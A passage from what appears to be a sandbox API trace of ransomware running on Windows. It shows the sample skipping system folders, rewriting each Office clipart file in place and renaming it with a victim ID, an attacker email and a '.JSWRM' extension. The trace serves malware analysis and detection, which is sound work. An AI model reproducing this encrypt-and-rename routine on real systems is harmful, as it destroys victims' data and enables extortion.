hHeap=0x1e0000) returned 1 [0093.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0093.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0093.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0093.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0093.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0093.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.606] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06450_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06450_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0093.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0093.606] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x629, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH00601G.GIF", cAlternateFileName="")) returned 1 [0093.606] lstrcmpiW (lpString1="PH00601G.GIF", lpString2=".") returned 1 [0093.606] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="..") returned 1 [0093.606] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="...") returned 1 [0093.606] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="windows") returned -1 [0093.606] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="recovery") returned -1 [0093.606] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="perflogs") returned 1 [0093.606] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="documents and settings") returned 1 [0093.606] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="$RECYCLE.BIN") returned 1 [0093.607] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="system volume information") returned -1 [0093.607] lstrcmpiW (lpString1="PH00601G.GIF", lpString2="msocache") returned 1 [0093.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0093.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH00601G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH00601G.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH00601G.GIF", lpUsedDefaultChar=0x0) returned 12 [0093.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0093.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH00601G.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH00601G.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH00601G.GIF", lpUsedDefaultChar=0x0) returned 12 [0093.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0093.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0093.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0093.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00601g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.607] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1577) returned 1 [0093.607] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x620) returned 0x2332c0 [0093.607] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x620, lpOverlapped=0x0) returned 1 [0093.609] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.609] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x620, lpOverlapped=0x0) returned 1 [0093.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0093.609] CloseHandle (hObject=0x314) returned 1 [0093.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0093.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0093.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0093.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0093.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0093.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0093.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.610] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00601g.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00601g.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0093.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0093.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0093.611] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101bc6d0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8628, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH00780U.BMP", cAlternateFileName="")) returned 1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2=".") returned 1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="..") returned 1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="...") returned 1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="windows") returned -1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="recovery") returned -1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="perflogs") returned 1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="documents and settings") returned 1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="system volume information") returned -1 [0093.611] lstrcmpiW (lpString1="PH00780U.BMP", lpString2="msocache") returned 1 [0093.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0093.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH00780U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH00780U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH00780U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0093.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0093.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH00780U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH00780U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH00780U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0093.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0093.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.611] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0093.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00780u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.612] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=34344) returned 1 [0093.612] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8620) returned 0x24d210 [0093.612] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8620, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8620, lpOverlapped=0x0) returned 1 [0093.616] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.616] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8620, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8620, lpOverlapped=0x0) returned 1 [0093.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.617] CloseHandle (hObject=0x314) returned 1 [0093.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0093.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0093.617] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0093.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0093.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0093.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0093.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0093.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0093.618] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.618] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00780u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00780u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0093.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0093.619] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01035U.BMP", cAlternateFileName="")) returned 1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2=".") returned 1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="..") returned 1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="...") returned 1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="windows") returned -1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="recovery") returned -1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="perflogs") returned 1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="documents and settings") returned 1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="system volume information") returned -1 [0093.619] lstrcmpiW (lpString1="PH01035U.BMP", lpString2="msocache") returned 1 [0093.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0093.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01035U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01035U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01035U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0093.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01035U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01035U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01035U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0093.619] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.619] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01035u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.620] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32400) returned 1 [0093.620] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e90) returned 0x24d210 [0093.621] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7e90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7e90, lpOverlapped=0x0) returned 1 [0093.625] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.625] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7e90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7e90, lpOverlapped=0x0) returned 1 [0093.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.626] CloseHandle (hObject=0x314) returned 1 [0093.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0093.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0093.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0093.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0093.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0093.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.626] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01035u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01035u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0093.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.627] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, 